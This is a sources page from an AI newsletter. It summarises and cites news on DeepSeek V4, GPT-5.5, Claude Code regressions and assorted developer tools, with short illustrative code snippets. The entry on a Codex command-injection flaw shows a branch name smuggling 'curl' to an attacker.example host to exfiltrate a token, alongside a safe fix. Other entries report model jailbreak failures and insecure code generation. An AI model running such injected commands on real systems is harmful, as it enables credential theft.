Wei (Jack) Sun

The frontier splits three ways: pricier, cheaper, and sorrier

Every URL the pipeline pulled into ranking for this issue — primary sources plus the supporting and contradicting findings each Researcher returned. Inline citations in the issue point back here.


Sources

DeepSeek V4 - almost on the frontier, a fraction of the price simonwillison.net

Chinese AI lab DeepSeek’s last model release was V3.2 (and V3.2 Speciale) last December. They just dropped the first of their hotly anticipated V4 series in the shape of two preview models, DeepSeek-V4-Pro and DeepSeek-V4-Flash. Both are Mixture of Experts models with a 1 million token context. Pro is 1.6T total parameters, 49B active; Flash is 284B total, 13B active. They’re using the standard MIT license. I think this makes DeepSeek-V4-Pro the new largest open weights model. It’s larger than Kimi…

DeepSeek-V4: a million-token context that agents can actually use huggingface.co

An update on recent Claude Code quality reports simonwillison.net

An update on recent Claude Code quality reports It turns out the high volume of complaints that Claude Code was providing worse quality results over the past two months was grounded in real problems. The models themselves were not to blame, but three separate issues in the Claude Code harness caused complex but material problems which directly affected users. Anthropic’s postmortem describes these in detail. This one in particular stood out to me: On March 26, we shipped a change to clear Claud…

A pelican for GPT-5.5 via the semi-official Codex backdoor API simonwillison.net

GPT-5.5 is out. It’s available in OpenAI Codex and is rolling out to paid ChatGPT subscribers. I’ve had some preview access and found it to be a fast, effective and highly capable model. As is usually the case these days, it’s hard to put into words what’s good about it - I ask it to build things and it builds exactly what I ask for! There’s one notable omission from today’s release - the API: API deployments require different safeguards and we are working closely with partners and customers o…

llm-openai-via-codex 0.1a0 simonwillison.net

Release: llm-openai-via-codex 0.1a0. Hijacks your Codex CLI credentials to make API calls with LLM, as described in my post about GPT-5.5. Tags: openai, llm, codex-cli

Sign of the future: GPT-5.5 oneusefulthing.org

One impressive step on the curve

Qwen3.6-27B: Flagship-Level Coding in a 27B Dense Model simonwillison.net

Alibaba’s Qwen3.6-27B dense model claims to beat its prior 397B-parameter MoE flagship across coding benchmarks while shrinking from 807GB to 55.6GB. Simon Willison ran the 16.8GB Q4_K_M quant locally via llama-server at roughly 25 tokens/second on a Mac.
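llama-server exposes an OpenAI-compatible HTTP API under /v1, so a locally served quant like this can be queried with nothing but the standard library. A minimal sketch (the model name, port, and prompt are illustrative assumptions, not the post's exact setup):

```python
# Minimal client for a local llama-server instance; llama.cpp's server
# speaks the OpenAI chat-completions format at /v1/chat/completions.
import json
import urllib.request


def build_chat_request(prompt: str, *, n_predict: int = 256) -> dict:
    """Build an OpenAI-style chat payload for llama-server."""
    return {
        # The model field is informational for a single-model llama-server.
        "model": "qwen3.6-27b-q4_k_m",
        "messages": [{"role": "user", "content": prompt}],
        "max_tokens": n_predict,
    }


def ask(prompt: str, base_url: str = "http://localhost:8080") -> str:
    """POST a chat request to a running llama-server and return the reply text."""
    body = json.dumps(build_chat_request(prompt)).encode()
    req = urllib.request.Request(
        f"{base_url}/v1/chat/completions",
        data=body,
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        data = json.load(resp)
    return data["choices"][0]["message"]["content"]


# Example (requires a running server):
#   answer = ask("Write a haiku about pelicans.")
```

At ~25 tokens/second on a Mac, responses of a few hundred tokens land in well under a minute, which is what makes a 16.8GB quant of a flagship-class coder practical locally.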

Speeding up agentic workflows with WebSockets in the Responses API openai.com

OpenAI details how it cut Codex agent loop overhead by adding WebSocket transport and connection-scoped caching to the Responses API, reducing per-call latency for long-running agentic workflows that repeatedly hit the same model context.
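The win is easy to see with back-of-envelope arithmetic. The numbers below are assumptions for illustration, not OpenAI's measurements: a persistent WebSocket pays connection setup once, while naive per-request HTTPS pays it on every tool-call round trip.

```python
# Illustrative arithmetic (assumed numbers): amortizing connection setup
# over an agent loop that makes many calls to the same endpoint.
handshake_ms = 80      # assumed TCP + TLS setup cost per fresh HTTPS request
calls = 50             # assumed tool-call round trips in one agentic task

# A persistent WebSocket connects once; fresh requests pay setup every time.
saved_ms = handshake_ms * (calls - 1)
print(f"~{saved_ms / 1000:.1f}s saved over {calls} calls")
```

In practice HTTP keep-alive already amortizes part of this, and the cited improvement also includes connection-scoped caching of repeated model context, so the sketch understates one side and overstates the other.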

Serving the For You feed simonwillison.net

Bluesky’s For You feed, used by about 72,000 people, runs from a single Go process on a 16-core, 96GB gaming PC in spacecowboy’s living room, fronted by a $7/month OVH VPS over Tailscale, with total operating cost of $30/month.
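The $30/month figure roughly decomposes into the VPS plus residential electricity. A back-of-envelope sketch, where the wattage and power rate are assumptions rather than figures from the post:

```python
# Back-of-envelope: how a $7 VPS plus a living-room gaming PC can land
# near the quoted $30/month. Wattage and $/kWh are assumed, not sourced.
vps = 7.00                         # OVH VPS, from the post
watts, hours, rate = 200, 730, 0.15  # assumed average draw, hours/month, $/kWh
power = watts / 1000 * hours * rate  # kWh consumed times price
print(f"${vps + power:.2f}/month")
```

Under these assumptions the total comes out just under $30, consistent with the quoted operating cost.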

russellromney/honker simonwillison.net

Russell Romney’s honker is a Rust SQLite extension that ports Postgres-style NOTIFY/LISTEN, durable Kafka-like streams, and the transactional outbox pattern to SQLite, adding 20+ custom SQL functions and using 1ms WAL-file stat polling for near-real-time delivery.
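The transactional outbox pattern honker ports is straightforward to sketch in plain sqlite3. This is not honker's API, just the shape of the pattern: the business row and the event row commit in one transaction, and a relay later drains unpublished events.

```python
# Transactional-outbox sketch in plain sqlite3 (illustrative; honker's
# actual SQL functions differ). One transaction writes both the business
# row and its event, so neither can be lost or published without the other.
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE orders (id INTEGER PRIMARY KEY, item TEXT);
    CREATE TABLE outbox (id INTEGER PRIMARY KEY, topic TEXT, payload TEXT,
                         published INTEGER DEFAULT 0);
""")


def place_order(item: str) -> None:
    # `with db:` wraps both inserts in a single transaction.
    with db:
        cur = db.execute("INSERT INTO orders (item) VALUES (?)", (item,))
        db.execute(
            "INSERT INTO outbox (topic, payload) VALUES (?, ?)",
            ("orders", f'{{"order_id": {cur.lastrowid}, "item": "{item}"}}'),
        )


def drain_outbox() -> list[tuple]:
    # A relay (honker polls the WAL file every ~1ms) reads unpublished
    # rows, delivers them, then marks them published.
    rows = db.execute(
        "SELECT id, topic, payload FROM outbox WHERE published = 0"
    ).fetchall()
    db.executemany("UPDATE outbox SET published = 1 WHERE id = ?",
                   [(r[0],) for r in rows])
    db.commit()
    return rows


place_order("coffee")
events = drain_outbox()
print(events)
```

The point of the pattern: a crash between the two writes is impossible (they share a transaction), and a crash in the relay just means the event is re-read on the next poll, giving at-least-once delivery.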

Extract PDF text in your browser with LiteParse for the web simonwillison.net

Simon Willison ported LlamaIndex’s LiteParse PDF text extractor to run entirely in-browser on PDF.js and Tesseract.js, vibe-coded in a 59-minute Claude Code session and deployed via GitHub Pages so files never leave the user’s machine.

It’s a big one simonwillison.net

Simon Willison’s weekly newsletter rounds up an unusually heavy week: 5 blog posts, 8 links, 3 quotes, a new chapter of his Agentic Engineering Patterns guide, plus benchmark images including pelicans on bicycles, a possum on an e-scooter and raccoons with ham radios.

How to Use Transformers.js in a Chrome Extension huggingface.co

Hugging Face publishes a walkthrough for embedding Transformers.js inside a Chrome extension, covering the manifest, service worker setup and model loading required to run inference locally in the browser without server calls.

Here’s how our TPUs power increasingly demanding AI workloads. blog.google

Learn how Google’s TPUs power increasingly demanding AI workloads with this new video.

Millisecond Converter simonwillison.net

Tool: Millisecond Converter. LLM reports prompt durations in milliseconds and I got fed up with having to think about how to convert those to seconds and minutes. Tags: tools
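The conversion itself is a few lines. A minimal sketch of the same idea (not the tool's actual code):

```python
def humanize_ms(ms: float) -> str:
    """Format a millisecond duration as seconds, or minutes plus seconds."""
    seconds = ms / 1000
    if seconds < 60:
        return f"{seconds:g}s"
    minutes, rem = divmod(seconds, 60)
    return f"{int(minutes)}m {rem:g}s"


print(humanize_ms(2500))    # 2.5s
print(humanize_ms(754000))  # 12m 34s
```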

Quoting Maggie Appleton simonwillison.net

[…] if you ever needed another reason to learn in public by digital gardening or podcasting or streaming or whathaveyou, add on that people will assume you’re more competent than you are. This will get you invites to very cool exclusive events filled with high-achieving, interesting people, even though you have no right to be there. A+ side benefit. — Maggie Appleton, Gathering Structures (via) Tags: blogging, maggie-appleton

References

Artificial Analysis artificialanalysis.ai

GPT-5.5 (xhigh) achieved a record accuracy of 57% on AA Omniscience… while recording an 86% hallucination rate, compared to Claude Opus 4.7’s 36% and Gemini 3.1 Pro’s 50%.

r/vibecoding thread on pricing reddit.com

GPT-5.5 is here — the price doubled but [uses] 40% fewer [output tokens]; effective net hike closer to 20% for most workloads.
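The thread's arithmetic checks out under one assumption (that output tokens dominate spend):

```python
# The Reddit claim as arithmetic: double the per-token price, ~40% fewer
# output tokens, so effective cost multiplies out to about 1.2x.
price_multiplier = 2.0    # price doubled
token_multiplier = 0.60   # 40% fewer output tokens
effective = price_multiplier * token_multiplier
print(f"effective cost multiplier: {effective:.2f}")  # 1.20, i.e. ~20% net hike
```

For workloads where input tokens are a large share of the bill, the effective hike would differ from this figure.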

Xuepilot blog on Mollick review blog.xuepilot.com

GPT-5.5 could turn a decade of raw research data into a high-quality academic paper in four prompts, yet long-form fiction remained ‘flat,’ ‘uncanny,’ and riddled with repetitive archetypes.

VentureBeat on Anthropic crackdown venturebeat.com

Anthropic formalized its stance by updating Consumer Terms to forbid using Free/Pro/Max OAuth tokens in any product other than the official Claude interface or Claude Code CLI — closing the arbitrage loophole OpenCode had exploited.

BeyondTrust security research beyondtrust.com

A command injection vulnerability in the Codex backend allowed attackers to smuggle bash commands through the GitHub branch parameter and exfiltrate User Access Tokens from the Codex cloud container.
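The bug class is the classic one: interpolating a user-controlled string (here, a branch name) into a shell command line. A generic illustration of the vulnerable and safe shapes; this is not Codex's actual code:

```python
# Illustrative only: how an unsanitized branch name smuggles a command.
# The vulnerable form builds a shell string; the safe form passes argv
# as a list so the branch stays a single (possibly invalid) argument.

def vulnerable_cmd(branch: str) -> str:
    # User input interpolated into a shell string: `;` and `$(...)` escape.
    return f"git fetch origin {branch}"


def safe_cmd(branch: str) -> list[str]:
    # argv form, executed without a shell: no metacharacter interpretation.
    return ["git", "fetch", "origin", branch]


evil = "main; curl http://attacker.example/$TOKEN"
print(vulnerable_cmd(evil))  # a shell would run the curl after the fetch
print(safe_cmd(evil))        # the whole string is one argument to git
```

Run through a shell, the first form exfiltrates whatever `$TOKEN` expands to, which is exactly the User Access Token theft the research describes.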

Forbes on Steinberger hire forbes.com

OpenAI hired OpenClaw creator Peter Steinberger and committed to spinning the project into an independent OpenAI-backed foundation — a move analysts read as buying developer loyalty after Anthropic’s blocks.

Artificial Analysis artificialanalysis.ai

DeepSeek V4 Pro and Flash exhibit hallucination rates of 94% and 96% respectively on the AA-Omniscience benchmark; while V4 Pro improved 11 points over V3.2 to a score of -10, the negative score still reflects a model that generates more incorrect than correct answers on adversarial knowledge tasks.
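A negative score makes sense if the benchmark scores correct answers +1, incorrect answers −1, and abstentions 0; that scoring rule is an assumption about the metric here, not Artificial Analysis's published spec. A worked example:

```python
# Assumed scoring: percent correct minus percent incorrect, abstentions
# scoring zero. Under this rule a score of -10 means wrong answers
# outnumber right ones by 10 percentage points.
def omniscience_index(pct_correct: float, pct_incorrect: float) -> float:
    return pct_correct - pct_incorrect


# e.g. 40% correct, 50% incorrect, 10% abstained:
print(omniscience_index(40, 50))  # -10
```

Under this rule a model can lift its score either by answering more questions correctly or simply by abstaining instead of hallucinating, which is why the high hallucination rates drag V4's score below zero.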

Tom’s Hardware tomshardware.com

DeepSeek launches 1.6 trillion parameter V4 on Huawei chips as US escalates AI theft accusations — Anthropic alleged DeepSeek used over 24,000 fraudulent accounts to run 16 million queries against Claude to extract reasoning and coding capabilities.

Cisco Security blog (legacy R1 evaluation) blogs.cisco.com

DeepSeek-R1 failed to block a single harmful prompt across the HarmBench dataset — a 100% attack success rate — making it roughly 11 times more likely to be exploited by cybercriminals than GPT-4o or Gemini; V4’s safety documentation remains limited compared to U.S. labs’ detailed safety cards.

VentureBeat venturebeat.com

DeepSeek V4 arrives with near-state-of-the-art intelligence at 1/6th the cost of Opus 4.7 / GPT-5.5; V4-Pro reached approximately 91.2% on SWE-bench Verified, placing it in the same tier as Claude Opus 4.7.

Apidog deployment guide apidog.com

Unsloth’s dynamic quantization shrinks V4-Flash to roughly 157–160GB, making 128GB M-series MacBooks viable only with aggressive 2-bit quants; users must set min_p=0.05 and temperature ~0.6 or 1.58-bit versions produce ‘rare token’ incoherence.
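The 157–160GB figure is consistent with simple size arithmetic on the 284B-parameter Flash model, assuming the dynamic-quant mix averages around 4.5 bits per weight (the bit-width is an assumption; Unsloth mixes precisions per layer):

```python
# Rough size check: total parameters times average bits/weight, in GB.
# 4.5 bits/weight is an assumed average for a dynamic-quant mix.
params = 284e9
bits_per_weight = 4.5
size_gb = params * bits_per_weight / 8 / 1e9
print(f"{size_gb:.0f} GB")
```

That lands right on the reported range, and shows why only far more aggressive ~2-bit quants (roughly 71GB by the same arithmetic) fit in a 128GB MacBook with room left for context.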

VentureBeat venturebeat.com

An April 16 system prompt instruction told the model to ‘keep text between tool calls to ≤25 words’ and final responses to ≤100 words — a verbosity cap that produced a measurable ~3% drop in coding evaluations before being rolled back on April 20.

Business Insider businessinsider.com

Anthropic explicitly denies that it ever degrades models for capacity or cost-management reasons, framing the regressions as unintended consequences of latency optimizations rather than ‘nerfing.’

Forbes / Veracode analysis forbes.com

Veracode found Claude Opus 4.7 introduced security vulnerabilities in 52% of tested coding tasks — nearly double the rate of comparable OpenAI models — raising questions about quality even after the harness fixes.

Medium — ‘Anthropic Admitted Claude Code Broke: We Were Right’ medium.com

AMD senior director Stella Laurenzo published an audit of 6,850+ Claude Code sessions and 234,000 tool calls showing a sharp shift from ‘research-first’ to ‘lazy edit-first’ behavior — external evidence that forced Anthropic past its initial ‘skill issue’ dismissals.

Tessl blog tessl.io

This is Anthropic’s second major quality postmortem in seven months — September 2025 blamed TPU compiler bugs and context-routing errors for similar ‘nerfing’ complaints, suggesting a recurring pattern where serving-stack changes silently degrade model behavior.

findskill.ai summary of HN thread 47878905 findskill.ai

Top HN commenters reacted with ‘you weren’t dogfooding?!’ and accused Anthropic of gaslighting users for weeks; Boris Cherny from the Claude Code team replied that the cache-clearing change was meant to protect users from runaway costs in 900k+ token contexts.


© 2026 Wei (Jack) Sun · jacksunwei.me · Built on Astro · hosted on Cloudflare